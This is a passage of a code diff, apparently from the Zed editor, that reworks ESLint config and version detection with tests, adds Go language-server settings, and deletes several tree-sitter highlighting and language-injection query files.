".eslintrc", + ".eslintrc.js", + ".eslintrc.cjs", + ".eslintrc.yaml", + ".eslintrc.yml", + ".eslintrc.json", + ]; - pub fn new(node: NodeRuntime) -> Self { - EsLintLspAdapter { node } + pub fn new(node: NodeRuntime, fs: Arc) -> Self { + EsLintLspAdapter { node, fs } } fn build_destination_path(container_dir: &Path) -> PathBuf { @@ -73,7 +87,7 @@ impl LspInstaller for EsLintLspAdapter { _: &mut AsyncApp, ) -> Result { let url = build_asset_url( - "zed-industries/vscode-eslint", + "microsoft/vscode-eslint", Self::CURRENT_VERSION_TAG_NAME, Self::GITHUB_ASSET_KIND, )?; @@ -148,6 +162,7 @@ impl LspInstaller for EsLintLspAdapter { ) -> Option { let server_path = Self::build_destination_path(&container_dir).join(EsLintLspAdapter::SERVER_PATH); + fs::metadata(&server_path).await.ok()?; Some(LanguageServerBinary { path: self.node.binary_path().await.ok()?, env: None, @@ -156,6 +171,42 @@ impl LspInstaller for EsLintLspAdapter { } } +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum EslintConfigKind { + Flat, + Legacy, +} + +#[derive(Debug, Default, Clone, PartialEq, Eq)] +struct EslintSettingsOverrides { + use_flat_config: Option, + experimental_use_flat_config: Option, +} + +impl EslintSettingsOverrides { + fn apply_to(self, workspace_configuration: &mut Value) { + if let Some(use_flat_config) = self.use_flat_config + && let Some(workspace_configuration) = workspace_configuration.as_object_mut() + { + workspace_configuration.insert("useFlatConfig".to_string(), json!(use_flat_config)); + } + + if let Some(experimental_use_flat_config) = self.experimental_use_flat_config + && let Some(workspace_configuration) = workspace_configuration.as_object_mut() + { + let experimental = workspace_configuration + .entry("experimental") + .or_insert_with(|| json!({})); + if let Some(experimental) = experimental.as_object_mut() { + experimental.insert( + "useFlatConfig".to_string(), + json!(experimental_use_flat_config), + ); + } + } + } +} + #[async_trait(?Send)] impl LspAdapter for 
EsLintLspAdapter { fn code_action_kinds(&self) -> Option> { @@ -173,9 +224,26 @@ impl LspAdapter for EsLintLspAdapter { cx: &mut AsyncApp, ) -> Result { let worktree_root = delegate.worktree_root_path(); - let use_flat_config = Self::FLAT_CONFIG_FILE_NAMES - .iter() - .any(|file| worktree_root.join(file).is_file()); + let requested_file_path = requested_uri + .as_ref() + .filter(|uri| uri.scheme() == "file") + .and_then(|uri| uri.to_file_path().ok()) + .filter(|path| path.starts_with(worktree_root)); + let eslint_version = find_eslint_version( + delegate.as_ref(), + worktree_root, + requested_file_path.as_deref(), + ) + .await?; + let config_kind = find_eslint_config_kind( + worktree_root, + requested_file_path.as_deref(), + eslint_version.as_ref(), + self.fs.as_ref(), + ) + .await; + let eslint_settings_overrides = + eslint_settings_overrides_for(eslint_version.as_ref(), config_kind); let mut default_workspace_configuration = json!({ "validate": "on", @@ -205,26 +273,13 @@ impl LspAdapter for EsLintLspAdapter { "showDocumentation": { "enable": true } - }, - "experimental": { - "useFlatConfig": use_flat_config, } }); + eslint_settings_overrides.apply_to(&mut default_workspace_configuration); - let file_path = requested_uri + let file_path = requested_file_path .as_ref() - .and_then(|uri| { - (uri.scheme() == "file") - .then(|| uri.to_file_path().ok()) - .flatten() - }) - .and_then(|abs_path| { - abs_path - .strip_prefix(&worktree_root) - .ok() - .map(ToOwned::to_owned) - }); - let file_path = file_path + .and_then(|abs_path| abs_path.strip_prefix(worktree_root).ok()) .and_then(|p| RelPath::unix(&p).ok().map(ToOwned::to_owned)) .unwrap_or_else(|| RelPath::empty().to_owned()); let override_options = cx.update(|cx| { @@ -271,6 +326,109 @@ impl LspAdapter for EsLintLspAdapter { } } +fn ancestor_directories<'a>( + worktree_root: &'a Path, + requested_file: Option<&'a Path>, +) -> impl Iterator + 'a { + let start = requested_file + .filter(|file| 
file.starts_with(worktree_root)) + .and_then(Path::parent) + .unwrap_or(worktree_root); + + start + .ancestors() + .take_while(move |dir| dir.starts_with(worktree_root)) +} + +fn flat_config_file_names(version: Option<&Version>) -> &'static [&'static str] { + match version { + Some(version) if version.major >= 10 => EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V10, + Some(version) if version.major == 9 => EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_57, + Some(version) if version.major == 8 && version.minor >= 57 => { + EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_57 + } + Some(version) if version.major == 8 && version.minor >= 21 => { + EsLintLspAdapter::FLAT_CONFIG_FILE_NAMES_V8_21 + } + _ => &[], + } +} + +async fn find_eslint_config_kind( + worktree_root: &Path, + requested_file: Option<&Path>, + version: Option<&Version>, + fs: &dyn Fs, +) -> Option { + let flat_config_file_names = flat_config_file_names(version); + + for directory in ancestor_directories(worktree_root, requested_file) { + for file_name in flat_config_file_names { + if fs.is_file(&directory.join(file_name)).await { + return Some(EslintConfigKind::Flat); + } + } + + for file_name in EsLintLspAdapter::LEGACY_CONFIG_FILE_NAMES { + if fs.is_file(&directory.join(file_name)).await { + return Some(EslintConfigKind::Legacy); + } + } + } + + None +} + +fn eslint_settings_overrides_for( + version: Option<&Version>, + config_kind: Option, +) -> EslintSettingsOverrides { + // vscode-eslint 3.x already discovers config files and chooses a working + // directory from the active file on its own. Zed only overrides settings + // for the two cases where leaving everything unset is known to be wrong: + // + // - ESLint 8.21-8.56 flat config still needs experimental.useFlatConfig. + // - ESLint 9.x legacy config needs useFlatConfig = false. + // + // All other cases should defer to the server's own defaults and discovery. 
+ let Some(version) = version else { + return EslintSettingsOverrides::default(); + }; + + match config_kind { + Some(EslintConfigKind::Flat) if version.major == 8 && (21..57).contains(&version.minor) => { + EslintSettingsOverrides { + use_flat_config: None, + experimental_use_flat_config: Some(true), + } + } + Some(EslintConfigKind::Legacy) if version.major == 9 => EslintSettingsOverrides { + use_flat_config: Some(false), + experimental_use_flat_config: None, + }, + _ => EslintSettingsOverrides::default(), + } +} + +async fn find_eslint_version( + delegate: &dyn LspAdapterDelegate, + worktree_root: &Path, + requested_file: Option<&Path>, +) -> Result> { + for directory in ancestor_directories(worktree_root, requested_file) { + if let Some(version) = + read_package_installed_version(directory.join("node_modules"), "eslint").await? + { + return Ok(Some(version)); + } + } + + Ok(delegate + .npm_package_installed_version("eslint") + .await? + .map(|(_, version)| version)) +} + /// On Windows, converts Unix-style separators (/) to Windows-style (\). 
/// On Unix, returns the path unchanged fn normalize_path_separators(path: &str) -> String { @@ -623,6 +781,217 @@ mod tests { } } + mod eslint_settings { + use super::*; + use ::fs::FakeFs; + use gpui::TestAppContext; + + #[test] + fn test_ancestor_directories_for_package_local_file() { + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + + let directories: Vec<&Path> = + ancestor_directories(&worktree_root, Some(&requested_file)).collect(); + + assert_eq!( + directories, + vec![ + Path::new(&unix_path_to_platform("/workspace/packages/web/src")), + Path::new(&unix_path_to_platform("/workspace/packages/web")), + Path::new(&unix_path_to_platform("/workspace/packages")), + Path::new(&unix_path_to_platform("/workspace")), + ] + ); + } + + #[test] + fn test_eslint_8_flat_root_repo_uses_experimental_flag() { + let version = Version::parse("8.56.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!( + settings, + EslintSettingsOverrides { + use_flat_config: None, + experimental_use_flat_config: Some(true), + } + ); + } + + #[test] + fn test_eslint_8_57_flat_repo_uses_no_override() { + let version = Version::parse("8.57.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!(settings, EslintSettingsOverrides::default()); + } + + #[test] + fn test_eslint_9_legacy_repo_uses_use_flat_config_false() { + let version = Version::parse("9.0.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Legacy)); + + assert_eq!( + settings, + EslintSettingsOverrides { + use_flat_config: Some(false), + experimental_use_flat_config: None, + } + ); + } + + #[test] + fn test_eslint_10_repo_uses_no_override() { + let 
version = Version::parse("10.0.0").expect("valid ESLint version"); + let settings = + eslint_settings_overrides_for(Some(&version), Some(EslintConfigKind::Flat)); + + assert_eq!(settings, EslintSettingsOverrides::default()); + } + + #[gpui::test] + async fn test_eslint_8_56_does_not_treat_cjs_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.cjs": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + let version = Version::parse("8.56.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, None); + } + + #[gpui::test] + async fn test_eslint_8_57_treats_cjs_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.cjs": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + let version = Version::parse("8.57.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_eslint_10_treats_typescript_config_as_flat_config(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ "eslint.config.ts": "" }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform("/workspace/src/index.js")); + 
let version = Version::parse("10.0.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_package_local_flat_config_is_preferred_for_monorepo_file( + cx: &mut TestAppContext, + ) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ + "eslint.config.js": "", + "packages": { + "web": { + "eslint.config.js": "" + } + } + }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + let version = Version::parse("8.56.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Flat)); + } + + #[gpui::test] + async fn test_package_local_legacy_config_is_detected_for_eslint_9( + cx: &mut TestAppContext, + ) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + unix_path_to_platform("/workspace"), + json!({ + "packages": { + "web": { + ".eslintrc.cjs": "" + } + } + }), + ) + .await; + let worktree_root = PathBuf::from(unix_path_to_platform("/workspace")); + let requested_file = PathBuf::from(unix_path_to_platform( + "/workspace/packages/web/src/index.js", + )); + let version = Version::parse("9.0.0").expect("valid ESLint version"); + + let config_kind = find_eslint_config_kind( + &worktree_root, + Some(&requested_file), + Some(&version), + fs.as_ref(), + ) + .await; + + assert_eq!(config_kind, Some(EslintConfigKind::Legacy)); + } + } + #[cfg(windows)] mod windows_style_paths { use super::*; diff --git a/crates/languages/src/gitcommit/injections.scm b/crates/languages/src/gitcommit/injections.scm deleted 
file mode 100644 index 8fb9b459679489be7588d1ab9b6d53e40ea10c60..0000000000000000000000000000000000000000 --- a/crates/languages/src/gitcommit/injections.scm +++ /dev/null @@ -1,9 +0,0 @@ -((comment) @content - (#set! injection.language "comment") -) - -((scissors) @content - (#set! "language" "diff")) - -((rebase_command) @content - (#set! "language" "git_rebase")) diff --git a/crates/languages/src/go.rs b/crates/languages/src/go.rs index abcb890566d9c0d0d6d9fe85b565c74825775250..73e9b162f4d6e76c4a42d4e24accfd90e79733c9 100644 --- a/crates/languages/src/go.rs +++ b/crates/languages/src/go.rs @@ -2,14 +2,19 @@ use anyhow::{Context as _, Result}; use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; -use gpui::{App, AsyncApp, Task}; +use gpui::{App, AsyncApp, Entity, Task}; use http_client::github::latest_github_release; pub use language::*; -use language::{LanguageToolchainStore, LspAdapterDelegate, LspInstaller}; +use language::{ + LanguageName, LanguageToolchainStore, LspAdapterDelegate, LspInstaller, + language_settings::LanguageSettings, +}; use lsp::{LanguageServerBinary, LanguageServerName}; +use project::lsp_store::language_server_settings; use regex::Regex; -use serde_json::json; +use serde_json::{Value, json}; +use settings::SemanticTokenRules; use smol::fs; use std::{ borrow::Cow, @@ -24,7 +29,15 @@ use std::{ }, }; use task::{TaskTemplate, TaskTemplates, TaskVariables, VariableName}; -use util::{ResultExt, fs::remove_matching, maybe}; +use util::{ResultExt, fs::remove_matching, maybe, merge_json_value_into}; + +pub(crate) fn semantic_token_rules() -> SemanticTokenRules { + let content = grammars::get_file("go/semantic_token_rules.json") + .expect("missing go/semantic_token_rules.json"); + let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); + settings::parse_json_with_comments::(json) + .expect("failed to parse go semantic_token_rules.json") +} fn server_binary_arguments() -> Vec { 
vec!["-mode=stdio".into()] @@ -192,9 +205,16 @@ impl LspAdapter for GoLspAdapter { async fn initialization_options( self: Arc, - _: &Arc, + delegate: &Arc, + cx: &mut AsyncApp, ) -> Result> { - Ok(Some(json!({ + let semantic_tokens_enabled = cx.update(|cx| { + LanguageSettings::resolve(None, Some(&LanguageName::new("Go")), cx) + .semantic_tokens + .enabled() + }); + + let mut default_config = json!({ "usePlaceholders": false, "hints": { "assignVariableTypes": true, @@ -204,8 +224,35 @@ impl LspAdapter for GoLspAdapter { "functionTypeParameters": true, "parameterNames": true, "rangeVariableTypes": true - } - }))) + }, + "semanticTokens": semantic_tokens_enabled + }); + + let project_initialization_options = cx.update(|cx| { + language_server_settings(delegate.as_ref(), &self.name(), cx) + .and_then(|s| s.initialization_options.clone()) + }); + + if let Some(override_options) = project_initialization_options { + merge_json_value_into(override_options, &mut default_config); + } + + Ok(Some(default_config)) + } + + async fn workspace_configuration( + self: Arc, + delegate: &Arc, + _: Option, + _: Option, + cx: &mut AsyncApp, + ) -> Result { + Ok(cx + .update(|cx| { + language_server_settings(delegate.as_ref(), &self.name(), cx) + .and_then(|settings| settings.settings.clone()) + }) + .unwrap_or_default()) } async fn label_for_completion( @@ -544,7 +591,7 @@ impl ContextProvider for GoContextProvider { ))) } - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { let package_cwd = if GO_PACKAGE_TASK_VARIABLE.template_value() == "." 
{ None } else { diff --git a/crates/languages/src/go/brackets.scm b/crates/languages/src/go/brackets.scm deleted file mode 100644 index 05fb1d7f9219889d652bbdbb294ca45e72cc9c05..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/brackets.scm +++ /dev/null @@ -1,6 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -((rune_literal) @open @close (#set! rainbow.exclude)) diff --git a/crates/languages/src/go/debugger.scm b/crates/languages/src/go/debugger.scm deleted file mode 100644 index f22b91f938e1159fa9bfec99f5000976766faf06..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/debugger.scm +++ /dev/null @@ -1,26 +0,0 @@ -(parameter_declaration (identifier) @debug-variable) - -(short_var_declaration (expression_list (identifier) @debug-variable)) - -(var_declaration (var_spec (identifier) @debug-variable)) - -(const_declaration (const_spec (identifier) @debug-variable)) - -(assignment_statement (expression_list (identifier) @debug-variable)) - -(binary_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(call_expression (argument_list (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]"))) - -(return_statement (expression_list (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]"))) - -(range_clause (expression_list (identifier) @debug-variable)) - -(parenthesized_expression (identifier) @debug-variable - (#not-match? 
@debug-variable "^[A-Z]")) - -(block) @debug-scope -(function_declaration) @debug-scope diff --git a/crates/languages/src/go/imports.scm b/crates/languages/src/go/imports.scm deleted file mode 100644 index 7f0ff2d46e6a271d4258d23f46cc942830e2c6f9..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_spec - name: [ - (dot) - (package_identifier) - ] - path: (interpreted_string_literal - (interpreted_string_literal_content) @namespace) -) @wildcard @import - -(import_spec - !name - path: (interpreted_string_literal - (interpreted_string_literal_content) @namespace) -) @wildcard @import diff --git a/crates/languages/src/go/indents.scm b/crates/languages/src/go/indents.scm deleted file mode 100644 index abbb72eb379d5fbb52267a633c60def07895a081..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/indents.scm +++ /dev/null @@ -1,9 +0,0 @@ -[ - (assignment_statement) - (call_expression) - (selector_expression) -] @indent - -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/go/injections.scm b/crates/languages/src/go/injections.scm deleted file mode 100644 index 58583f4d22c7db8016397d8e47cd817b7c240764..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/injections.scm +++ /dev/null @@ -1,735 +0,0 @@ -; Refer to https://github.com/nvim-treesitter/nvim-treesitter/blob/master/queries/go/injections.scm#L4C1-L16C41 -((comment) @injection.content - (#set! injection.language "comment") -) - -(call_expression - (selector_expression) @_function - (#any-of? @_function - "regexp.Match" "regexp.MatchReader" "regexp.MatchString" "regexp.Compile" "regexp.CompilePOSIX" - "regexp.MustCompile" "regexp.MustCompilePOSIX") - (argument_list - . - [ - (raw_string_literal) - (interpreted_string_literal) - ] @injection.content - (#set! 
injection.language "regex") - )) - -; INJECT SQL -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*sql\\s*\\*\\/$") - (#set! 
injection.language "sql") -) - -; INJECT JSON -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*json\\s*\\*\\/") ; /* json */ or /*json*/ - (#set! 
injection.language "json") -) - -; INJECT YAML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*yaml\\s*\\*\\/") ; /* yaml */ or /*yaml*/ - (#set! 
injection.language "yaml") -) - -; INJECT XML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*xml\\s*\\*\\/") ; /* xml */ or /*xml*/ - (#set! 
injection.language "xml") -) - -; INJECT HTML -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*html\\s*\\*\\/") ; /* html */ or /*html*/ - (#set! 
injection.language "html") -) - -; INJECT JS -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*js\\s*\\*\\/") ; /* js */ or /*js*/ - (#set! 
injection.language "javascript") -) - - -; INJECT CSS -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*css\\s*\\*\\/") ; /* css */ or /*css*/ - (#set! 
injection.language "css") -) - - -; INJECT LUA -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*lua\\s*\\*\\/") ; /* lua */ or /*lua*/ - (#set! 
